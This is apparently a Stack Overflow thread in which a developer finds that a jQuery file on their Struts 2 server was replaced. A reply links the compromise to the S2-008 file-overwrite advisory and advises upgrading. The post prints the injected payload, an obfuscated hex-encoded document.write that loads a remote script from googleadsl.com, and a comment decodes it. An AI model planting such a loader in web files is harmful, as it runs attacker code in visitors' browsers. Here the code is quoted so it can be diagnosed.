# struts 2 bug gaining root access to server

Tags: struts2, root

been researching for quite sometime now (research not limited to this site only) but I have not seen any discussion on this "alleged" issue.

My friend told me that they found a critical issue in using struts 2 (2.2.1.1). Told me that a hacker can gain root access to your project's directory. hence he can modify the files in the projects.

I took less notice of it before. But just now, I experienced the same issue.

**[Alleged Bug]:** Been wondering why, after I deployed my project, all DOM elements whose events are triggered using javascript dont work after sometime. Further investigation, I found out that the jquery lib I uploaded to the server (used jquery-1.3.2.min.js) had been replaced (its content). The filename is the same but the content is something unrecognizable (at least to me), see below:

```
var _0xfcda=["\x3C\x53\x43\x52\x49\x50\x54\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x61\x64\x73\x6C\x2E\x63\x6F\x6D\x2F\x73\x70\x63\x6F\x64\x65\x2F\x63\x70\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xfcda[1]](_0xfcda[0]);
```

That's when I remembered what my friend told me. Can somebody confirm if the said bug/issue is legit and explain here what it is all about and how it can be fixed. I think this is a pretty huge glitch.

**NOTE:** I am pretty sure that the code above is not ours. I checked my local copy, and the code is different and everything is okay in my local. Pretty sure as well that nobody else aside from me, knows the root password of the server.

**NOTE:** I will use the latest struts 2 release, but I think this issue, if legits, need to be discussed thoroughly as a headsup/reference to the community.

Comment: "Unrecognizable?" It's hex; `<SCRIPT src="http://www.googleadsl.com/spcode/cp.js"></script>`, which is http://whois.domaintools.com/googleadsl.com

Answer (score 1):

> My friend told me that they found a critical issue in using struts 2
>   (2.2.1.1). Told me that a hacker can gain root access to your
>   project's directory. hence he can modify the files in the projects.

I think he was referring to one of the vulnerabilities discovered and [announced on December 2011](https://struts.apache.org/announce-2011.html).

You can read the details in [Security Bulletin S2-008](http://struts.apache.org/release/2.3.x/docs/s2-008.html).

> **Arbitrary File Overwrite in Struts <= 2.3.1 (ParameterInterceptor)**
>   While accessing the flag `allowStaticMethodAccess` within parameters is
>   prohibited since Struts `2.2.3.1` an attacker can still access public
>   constructors with only one parameter of type `String` to create new Java
>   objects and access their setters with only one parameter of type
>   `String`. This can be abused in example to create and overwrite
>   arbitrary files. To inject forbidden characters into a filename an
>   uninitialized string property can be used.

I can't know if this is what happened to you, but it's probably what your friend was talking about.

> I will use the latest struts 2 release

Then you have (almost) nothing to worry about... until the next vulnerability get discovered and disclosed, then you will need to upgrade again.

As for every software out there, always use the latest (stable) version.

Comment: +1 for until the next vulnerability get discovered. :) Maybe it is better to put "latest **stable** versions".